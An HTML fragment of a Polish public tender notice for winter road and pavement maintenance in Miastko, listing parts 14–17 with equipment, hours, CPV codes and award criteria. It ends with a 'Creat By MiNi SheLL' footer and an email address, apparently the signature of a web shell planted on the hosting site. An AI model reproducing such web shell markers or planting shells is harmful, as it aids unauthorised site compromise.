                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg i ulic powiatowych na terenie gminy Miastko  z bazą  w Miastku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką  1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    - 80 godz.
Sprzęt ten będzie pracował na terenie gminy Miastko.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w  Miastku);
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>15
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg i ulic powiatowych na terenie gminy Miastko  z bazą  w Miastku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane - samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką  1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    - 80 godz.
Sprzęt ten będzie pracował na terenie gminy Miastko.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w  Miastku);
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>16
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg i ulic powiatowych na terenie gminy Miastko  z bazą  w Miastk             <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane ciągnikiem rolniczym o mocy min. 80 KM z pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gmin: Miastko, Lipnica, Kołczygłowy,
Tuchomie; 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>17
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania ulic i chodników powiatowych na terenie gminy Miastko  z bazą  w Miastku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane ciągnikiem z pługiem i piaskarką  1 szt. z przeznaczeniem na
odśnieżanie i posypywanie chodników przy ulicach w mieście Miastku oraz 
w miejscowości Wołcza Wielka oraz interwencyjnie na ulice w Miastku (garażowanie na
terenie w/w gminy).
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 100 godz.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com